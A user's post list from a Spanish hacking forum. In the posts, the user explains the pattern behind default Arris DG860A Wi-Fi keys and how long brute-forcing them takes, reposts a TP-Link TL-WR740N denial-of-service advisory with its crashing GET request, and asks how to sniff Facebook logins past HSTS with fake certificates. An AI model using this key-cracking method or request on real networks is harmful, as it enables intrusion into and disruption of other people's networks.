elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Hacking Wireless / Re: Diccionario de claves para Arris VTR en: 19 Mayo 2019, 21:58 pm
prueba esto

https://lampiweb.com/foro/index.php?topic=14367.0  

sirve para otros modelos sobre los arris aca una pista aplicalo segun numero de modelo





hay un patrón muy sencillo con una estructura de lave que no es sin recordar las de los routers TRENDnet (Fulldisclosure WPA TRENDnet)
  La primera mitad de la llave WPA es simplemente el nombre del modelo (y sale en el eSSID por defecto big_smile ).
Así que las contraseñas por defecto de un Arris tienen todas esta estructura :
DG860AXXXXXX

Dónde las X son caracteres hexadecimales mayúsculas (16 posibilidades)
  Tenemos por lo tanto 6 desconocidas con un juego de caracteres de 16 símbolos.
Lo que nos da 16⁶ combinaciones posibles =  brute force completo con 16 777 216 contraseñas
  Un brute force de un poco más de 7 horas y media con una CPU básica como la mía (600 keys/segundos)
  Un i7 con sus 5000 key/segundos acaba con esta tarea en menos de una hora...


  Y esto no es todo : Podemos ver claramente que el final del pass es igual al final de del ESSID por defecto.
Si el essid por defecto esta en uso tendríamos un brute force sobre 4 caracteres.
DG860AXXXXEE

Dónde los X son desconocidas y los E son los dos últimos dígitos del eSSID en su orden.
Si conocemos el eSSID por defecto solo tendríamos que probar 65 536 contraseñas. big_smile
Un poco mas de un minuto con mi computadora de poco recursos, un poco mas de 10 segundos con un i7.

  Y podemos imaginar/temer que arris haya hecho lo que realmente sería uno de los peores algoritmos de la historia: Que nuestras 6 desconocidas son simplemente... el final del bSSID.
  Muchos modelos de routers hacen su eSSID por defecto con el final del bSSID.
O con el final de una mac del router que podemos adivinar haciendo "bSSID + 1" o "bSSID + 2".  
En este caso se podría generar la contraseña por defecto con un simple scan wireless.


aca una app para android

https://ayudacelular.net/wpsapp-pro-apk-descargar/
2  Foros Generales / Dudas Generales / problemas android y win xp modificado lite en: 25 Abril 2016, 00:54 am
al tratar instalar diferentes dispositivos android por medio de mtp ,es imposible que pueden funcionar, a pesar de instalar mtppk12 los driver, win media 11 etc generalmente sale un error en el driver mtp diciendo que el inf esta firmado para 95 e ´posterior, y su utilización es imposible

a que se puede deber sera por que al ser modificado para pc ligeros les faltaran alguna dll

le agradezco de antemano sus sabias respuestas
3  Programación / Scripting / ayuda python win xp en: 8 Octubre 2015, 03:54 am
como puedo ejecutar este programa https://code.google.com/p/miranda-upnp/ python en win xp instale la version 2.7 y no es posible sale sintaxis invalida no hay manera
4  Informática / Software / como instalo este programa linux en windoes en: 6 Octubre 2015, 03:36 am
en falla de intentar botear kali en usb como puedo instalar el programa descrito en el link en windows 7??

https://code.google.com/p/miranda-upnp/downloads/list
5  Seguridad Informática / Hacking / Re: Tengo una duda producto de snifer hsts en: 30 Septiembre 2015, 18:16 pm
...O instalar un certificado falso en el navegador y hacer creer que "http://www.facebok.com/" es auténtica.

:D

como `podria hacerlo¿?????
6  Seguridad Informática / Bugs y Exploits / como hago correr esto? en: 30 Septiembre 2015, 18:13 pm
soy algo novato en esto como hago correr la vulneribilad descrita a continuacion  :huh: :huh: :huh: :huh:


TP-Link TL-WR740N Wireless Router MitM httpd Denial Of Service


Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us

Affected version:

- Firmware version: 3.17.0 Build 140520 Rel.75075n (Released: 5/20/2014)
- Firmware version: 3.16.6 Build 130529 Rel.47286n (Released: 5/29/2013)
- Firmware version: 3.16.4 Build 130205 Rel.63875n (Released: 2/5/2013)
- Hardware version: WR740N v4 00000000 (v4.23)
- Model No. TL-WR740N / TL-WR740ND

Summary: The TL-WR740N is a combined wired/wireless network connection
device integrated with internet-sharing router and 4-port switch. The
wireless N Router is 802.11b&g compatible based on 802.11n technology
and gives you 802.11n performance up to 150Mbps at an even more affordable
price. Bordering on 11n and surpassing 11g speed enables high bandwidth
consuming applications like video streaming to be more fluid.

Desc: The TP-Link WR740N Wireless N Router network device is exposed to a
denial of service vulnerability when processing a HTTP GET request. This
issue occurs when the web server (httpd) fails to handle a HTTP GET request
over a given default TCP port 80. Resending the value 'new' to the 'isNew'
parameter in 'PingIframeRpm.htm' script to the router thru a proxy will
crash its httpd service denying the legitimate users access to the admin
control panel management interface. To bring back the http srv and the
admin UI, a user must physically reboot the router.

Tested on: Router Webserver


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5210
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5210.php


13.11.2014

---


Replay

GET /userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&lineNum=1 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.1/userRpm/PingIframeRpm.htm?ping_addr=zeroscience.mk&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
7  Seguridad Informática / Hacking Wireless / alcatel one touch wps en: 27 Septiembre 2015, 18:50 pm
es tratado de auditar una con wps activado lo extraño es que no da intentos de pin(siempre el wifislax intenta el mismo) a que se debe como funciona?
8  Seguridad Informática / Hacking / Re: [ayuda] redireccionar web HSTS archivo host en: 26 Agosto 2015, 03:02 am
No, la única posibilidad es que clasifiques e inyectes un certificado (nada fácil) y si tienes suerte y es una versión vienja de firefox, no se dará cuenta que el certificado es falso

en caso del app android al inyectar certificado pierde conexion a internet cierto?
9  Seguridad Informática / Hacking / Tengo una duda producto de snifer hsts en: 25 Agosto 2015, 21:17 pm
si con cain hago redirrecionamiento a pagina tipo facebook a una pagina http podre snifearla???????????????????

y por que no podria???????????


agradeciendo de antemano sus respuestas
10  Informática / Software / problemas virtual box kali 32bit 2.0 en: 16 Agosto 2015, 22:58 pm
lo que pasa es que me es imposible instalarlo en el virtual box despues de que completa la instalacion se bugea y no hace nada probe con todos los metodos de instalacion y nada

actualizo:


solucione el problema anterior pero surgio otro instalo y todo pero cuando arranco kali me sali una imagen distorsionada se pone en negro y luego dice que vm fallo a que se debe
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines